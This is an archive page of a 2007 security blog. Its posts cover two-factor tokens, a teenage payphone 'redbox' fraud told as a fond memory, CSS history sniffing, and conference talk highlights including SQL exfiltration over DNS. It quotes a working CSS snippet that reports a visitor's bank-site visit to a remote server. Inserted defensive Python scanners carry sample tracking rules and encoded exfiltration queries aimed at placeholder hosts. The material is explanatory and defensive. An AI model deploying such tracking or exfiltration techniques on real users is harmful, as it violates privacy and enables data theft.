Archive for August, 2007
Vasco, an alternative to RSA SecurID hardware tokens
As a security consultant with exposure to many large enterprises I admit I’m biased toward RSA SecurID tokens. During penetration tests, our company has cracked tens of thousands of passwords. When I’m standing in front of a customer explaining why their password policies failed, they want to believe that changing this policy will help them. Secretly I know that humans will defeat the spirit of any password policy and that the best approach is to take the responsibility of password composition away from the end user. (When you stare at thousands of clear text passwords you develop a cynicism.)
August2007, you’ve been a good password, but it’s time I move on to owning enterprises with September2007.
The other day a friend asked me if there are any other products like SecurID he should be evaluating for his company as part of their plan to introduce two-factor authentication. Apart from SecurID the only other device that left me thinking “Hey, this thing works” is Vasco’s Digipass. Any two-factor system worth its weight in salt should provide authentication hooks to the popular services. If you plan to use the solution with custom web applications, you may need to dig a little deeper… maybe a lot deeper. Most solutions have hook-in APIs, but it takes some effort to piece it all together.
If you are evaluating two-factor authentication devices, make a list of the top services you need authentication for:
- Network devices
- Windows authentication
- Unix authentication
- VPN users
- Wireless user authentication
If a solution can cover 80% of your authentication needs and is cost effective, go with it. 80% coverage is 80% better than letting humans pick passwords; chances are with a little effort and creativity you can put something together to rein in the residual 20%. If you don’t have a two-factor solution, evaluate Vasco with the others.
-higB
3 comments

Oldschool Radioshack Redbox 1990’s Phreaking
I have a few big boxes of computer crap that I haven’t been able to part with (because you never know when a ZIP drive will come in handy). The other night I was rummaging through one of these boxes and stumbled upon my Radioshack pocket tone dialer modified with a 6.5536 MHz crystal. The memory floodgates opened and I reminisced about the days of BBSes, Tradewars 2002, ANSI art packs, The Jolly Roger’s cookbook (remember thermite? good times), and countless phreaking texts. I got my initial fix via 1200 baud. After mowing lawns for a summer I was able to hook up the leet 2400 US Robotics.
Back in high school I was quite the ladies’ man. I had an 85 meg hard drive and leech status on all the local bulletin boards. After girls found out I had an SVGA monitor, Sound Blaster 16, and a 1x CD-ROM, they all wanted me. I used to think it was because I could draw boobs on my TI-85 graphing calculator, but the real reason for the XX chromosome attention was my crazy mad-ill tight soldering skillz.
Just like all teenage boys growing up I had an unhealthy infatuation with the phone company. (That’s normal, right?) I read on a BBS text about making free phone calls from pay phones by simulating the sounds that are transmitted when coins are dropped in. (more about redboxes and phreaking here) So with a soldering iron, a 6.5536 MHz crystal, and a Radio Shack 43-141 pocket tone dialer I went to work and built a working redbox.
After spending 30 dollars in parts I couldn’t wait to defraud PacBell of 25 cents. I remember the nervous feeling I had riding my bike over to a local church to try out my new babe-magnet redbox.
There was one small problem with my plan: for some reason, I didn’t have any friends outside of my area code to call.
Enjoy the video I posted on youtube: http://www.youtube.com/watch?v=AXZMgHKhefk
–higB
1 comment

The Scariest Website I Know
For years, about the only bookmarks in my browser that I think would count as ‘scary’ would have been the links for Bonsai Kittens and anything Evil Dead related. But a while back a new one was added to the list and I find I can’t keep myself from going back to it every few weeks. It seemed appropriate to bring up again in light of some of the Blackhat talks. While it has a pretty innocuous name, the page never fails to make my jaw drop and my heart start pounding louder. If you think you are strong enough, and have a clean pair of underwear within reach, surf over to http://www.browser-recon.info
For those of you with weak bladders, let me quickly explain what the site does. Their page contains code that will compare a number of popular sites to determine which of them you have visited in the past, then dynamically show you a graphic based on those results. No clicking on a security pop-up required. No strange browser configuration needed. Just some clever CSS checking that basically works like a human looking at a list of links to see which ones are blue (never been to before) or which ones are purple (visited links). While the thought of this keeps me up at night, I’m sure this has got to be the wet dream of numerous spammers and phishers. Talk about target marketing. Think anyone has figured out a way to data mine these results and done some crazy profiling?
And for that scary “not quite dead yet” moment: while disabling JavaScript prevents the Browser-Recon site demo from showing your bank logo, disabling JavaScript alone is not enough to solve this issue. Jeremiah Grossman was nice enough to demonstrate at Blackhat both a JavaScript and a non-JavaScript version. Simply use CSS and have it try to load a few well-crafted background images if it correctly recognizes visited links. Here’s a little of the code. Notice the link tag without any text to click on.
<!-- Code snippet from Browser Recon. -->
<!-- CSS tags that will send a message back to our webserver of where you've been -->
<style type="text/css">
#n1004:visited { background: url(https://www.indiana.edu/~phishing/browser-recon/?url=1004&session=bc66632d49ca); }
</style>
<!-- A link with no text. We can check that for the "visited" property in CSS above -->
<a id="n1004" href="https://ibank.amsouth.com/auth/EnrollOverview.aspx"></a>
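The defensive counterpart to the snippet above is being able to spot the pattern in a stylesheet: a :visited selector whose declarations load something with url(...), which hands the visit to whatever server answers that request. The following is an added example, not code from Browser-Recon or from this post; it scans flat CSS text for exactly that pattern and reports the selector, property, URL and host for each hit. The stylesheet it runs on is constructed, and tracker.example is a placeholder host.

```python
"""Audit a stylesheet for :visited rules that trigger a network fetch (added example)."""
import re
from urllib.parse import urlsplit

# Constructed stylesheet modelled on the Browser-Recon snippet; hosts are placeholders.
SAMPLE_CSS = """
a { color: blue; }
a:visited { color: purple; }
#n1004:visited { background: url(https://tracker.example/collect?url=1004&session=abc123); }
.nav li:visited { background-image: url("https://tracker.example/collect?id=2"); }
#note:visited { list-style-image: url(/img/dot.png); }
body { background: url(/img/bg.png); }
"""

# Matches flat "selector { declarations }" rules; nested @media blocks are not handled.
RULE_RE = re.compile(r"([^{}]+)\{([^}]*)\}", re.S)
URL_RE = re.compile(r"""url\(\s*['"]?([^'")]+?)['"]?\s*\)""", re.I)


def parse_rules(css):
    """Yield (selector, [(property, value), ...]) for each rule in the CSS text."""
    for match in RULE_RE.finditer(css):
        selector = " ".join(match.group(1).split())
        declarations = []
        for decl in match.group(2).split(";"):
            prop, sep, value = decl.partition(":")
            if sep:
                declarations.append((prop.strip().lower(), value.strip()))
        yield selector, declarations


def find_visited_fetches(css):
    """Return every url() loaded from a :visited rule, with its selector and property."""
    findings = []
    for selector, declarations in parse_rules(css):
        if ":visited" not in selector.lower():
            continue
        for prop, value in declarations:
            for url in URL_RE.findall(value):
                # A relative URL still leaks the visit to the page's own server;
                # an absolute one hands it to whatever host it names.
                host = urlsplit(url).hostname or "(same origin)"
                findings.append({"selector": selector, "property": prop,
                                 "url": url, "host": host})
    return findings


def summarize(css):
    """Map each receiving host to the number of :visited-triggered loads pointing at it."""
    counts = {}
    for finding in find_visited_fetches(css):
        counts[finding["host"]] = counts.get(finding["host"], 0) + 1
    return counts


if __name__ == "__main__":
    for finding in find_visited_fetches(SAMPLE_CSS):
        print(f"{finding['selector']:20} {finding['property']:18} -> {finding['url']}")
    print(summarize(SAMPLE_CSS))
```

The check is deliberately property-agnostic: background, background-image and list-style-image all fetch, so the selector is the signal, not the property name. Browsers have since restricted which properties :visited may change precisely to close this channel, which leaves this kind of scan as an audit of what a page is trying to do rather than a measure of whether it still works.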
Now I can sleep a little better knowing there’s a Firefox plug-in to block this, but look at when it was originally published: November 20, 2005. That’s quite a bit of time and this feature is not yet patched? I’ve seen a lot of people grumbling over the state of security in web browsers recently (DNS pinning being the latest pain point). With my NoScript, SafeHistory, uninstalled Java, disabled autocomplete version of Firefox running in a VM… I can’t say I disagree.
-b3nn
No comments

Wrapping Up the Cons: Best of BlackHat and Defcon 2007
Spot the Reporter anyone? It was another good adventure out in Las Vegas last week. Obviously the best part of any con is the people who are there. It was great seeing old friends and meeting new ones. I typically ask everyone “what was the best presentation you saw?” I thought I’d turn the tables and give my view on that question. I know I missed a few good ones (it would be hard to make a 9am talk in Las Vegas even if it were held in my hotel room) but here are the highlights from what I did catch.
EVDO Hacking (King Tuna) - I suspect most people found this talk more entertaining than educational and King Tuna wins for best Ricky Gervais character impersonation. I found myself cringing in my seat for his unfortunate first time presenter problems, however we walked away with two kick ass pieces of info. First, you can read files from your EVDO card with BitPim (or QPST if you have loose morals and bittorrent skillz) and the Kyocera KPC650 card’s firmware is unlocked. Tasty.
SQL out-of-band Channeling (Patrik Karlsson) - No SQL error messages being returned? No problem. I’ll just take my query results over DNS. Yup, that’s right. Over DNS (I had to double check I hadn’t just walked into the Kaminsky talk.) The short version is there are a number of database functions that will trigger DNS lookups. Craft the “hostnames”, which are really the data, and request them from a domain the attacker owns. Check the slides because they go into depth on properly encoding and breaking up the data. This would get through just about any network architecture and firewall egress filter I’ve seen. Can you live without DNS lookups on your database server? Probably. Time to add that to your hardening checklists.
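The hardening point above (a database server should not be doing DNS lookups at all) is also a detection point. The following is an added example, not from Patrik Karlsson’s talk or slides: a small scanner over resolver log lines that flags queries coming from a database server, leading labels that look like encoded data, and several distinct names fanning out under one parent domain, the three traits the description above implies. The log format, the sample lines, the addresses, attacker.example and every threshold are constructed assumptions.

```python
"""Flag DNS queries that look like out-of-band data channeling (added example)."""
import math
import re
from collections import defaultdict

# Constructed resolver log, "<time> <client-ip> <query-name> <qtype>" per line.
# 10.1.9.5 plays the database server; attacker.example is a placeholder domain.
SAMPLE_LOG = """\
12:00:01 10.1.2.30 www.example.com A
12:00:02 10.1.2.30 updates.example.com A
12:00:03 10.1.9.5 4a6f686e2c4a616e652c31323334.data.attacker.example A
12:00:03 10.1.9.5 2c3635343332312c426f622c39.data.attacker.example A
12:00:04 10.1.9.5 6162636465663233343536373839.data.attacker.example A
12:00:05 10.1.2.31 mail.example.com MX
"""

DB_SERVERS = {"10.1.9.5"}          # assumed: hosts with no business resolving names
HEX_LABEL_RE = re.compile(r"^[0-9a-f]+$", re.I)
LONG_LABEL = 24                    # assumed: real hostname labels are rarely this long
ENTROPY_MIN = 3.0                  # assumed: bits/char typical of encoded payloads
FANOUT_MIN = 3                     # assumed: distinct names under one parent before we care


def shannon_entropy(s):
    """Bits of entropy per character of s (0.0 for one repeated character)."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def parse_line(line):
    """Split one log line into its fields; returns None for lines that do not fit."""
    parts = line.split()
    if len(parts) < 3:
        return None
    return {"time": parts[0], "client": parts[1], "qname": parts[2].rstrip(".").lower()}


def parent_domain(qname, levels=2):
    """Last `levels` labels of a name, e.g. x.data.attacker.example -> attacker.example."""
    return ".".join(qname.split(".")[-levels:])


def label_looks_encoded(label):
    """Long labels that are pure hex or high-entropy are treated as carried data."""
    return len(label) >= LONG_LABEL and (
        bool(HEX_LABEL_RE.match(label)) or shannon_entropy(label) >= ENTROPY_MIN)


def scan(log_text, db_servers=DB_SERVERS):
    """Return one finding per suspicious query: {"client", "qname", "reasons"}."""
    records = [r for r in map(parse_line, log_text.splitlines()) if r]
    names_under = defaultdict(set)
    for rec in records:
        names_under[parent_domain(rec["qname"])].add(rec["qname"])
    findings = []
    for rec in records:
        reasons = []
        if rec["client"] in db_servers:
            reasons.append("query from database server")
        if label_looks_encoded(rec["qname"].split(".")[0]):
            reasons.append("leading label looks like encoded data")
        parent = parent_domain(rec["qname"])
        siblings = names_under[parent]
        if len(siblings) >= FANOUT_MIN and any(
                label_looks_encoded(n.split(".")[0]) for n in siblings):
            reasons.append(f"{len(siblings)} distinct encoded names under {parent}")
        if reasons:
            findings.append({"client": rec["client"], "qname": rec["qname"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["client"], finding["qname"], "|", "; ".join(finding["reasons"]))
```

The database-server rule is the one worth keeping even if the other two are tuned away: it needs no guess about encoding, only an inventory of which hosts should never resolve names, and it fires on the first query rather than after a pattern has built up.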
WEP Cloaking Exposed (Vivek Ramachandran) - Hopefully just reading the explanation of “WEP Cloaking” will make your security stomach feel like you’ve had sushi straight from the Chicago river. But if you’ve ever seen sales people, you know they can suck down anything and then try to sell it on the way out. Thankfully the Air Tight group came to the table with strong examples of how flawed this security through obscurity “WEP Cloaking” idea is. While the rest of us don’t have a tool just yet to automate the same process which was shown, it’s only a matter of time. A point to remember, they said, was that a WEP cloaking/chaffing product still won’t make a wireless WEP network PCI compliant.
Extrusion Scanning (Matt Richards) - In the past, giving a customer a report about how many different ways we could tunnel data out of their internal network would be equivalent to giving them a graph about how wet water is. The good news is we have started to see customers that are taking the steps towards decently restricting outbound connections. Hopefully the eescan tool he talked about may be a way of quickly testing this out from an internal network.
Active Reversing/Virtual World Hacking (Greg Hoglund) - I’m so not logging on to WoW if this guy is online. I caught sections of both Greg Hoglund talks and was impressed with the ideas and examples. This is not my normal cup of h4×0r tea, so I’m not sure how innovative these tools and techniques are, but I like the overall idea. The more someone can understand and trace a program without having to go breakpoint by breakpoint in IDA Pro sounds like a good idea to me. Let’s lower the bar and get more people disassembling. Greg demo’ed some HBGary tools to quickly and easily isolate parts of a binary program that contain functions of interest.
Hack Your Car (higB) - Sure, I may have a little bias here, but it was still one of my favorite talks. You own the car, shouldn’t you own the computer on it? Pretty shocking to hear emissions tests often rely just on the info the computer tells them and not on actual tailpipe output. Maybe we need to take this talk to an EPA convention next.
-b3nn
No comments

hackyourcar
Download the Presentation:
Thanks b3nn (another phishme blogger) for being the video guy. We love the video: http://www.youtube.com/watch?v=D3hyzAD0q_c
Thanks for sending me to Vegas and giving away 100+ shirts: http://intrepidusgroup.com
Great site: http://www.osecuroms.org
Thank you to the enginuity team: http://www.enginuity.org
Thank you to all the hard workers and great forums at openecu: http://www.openecu.org
Special thanks once again to Tactrix for donating the hardware giveaways. These guys rock: http://tactrix.com
Nasioc of course: http://forums.nasioc.com/forums/forumdisplay.php?f=24
Water/Alc Injection information:
http://coolingmist.com/
http://www.alcohol-injection.com/
http://www.snowperformance.net/
http://www.aquamist.co.uk/
See you at next year’s DefCon!
–higB
No comments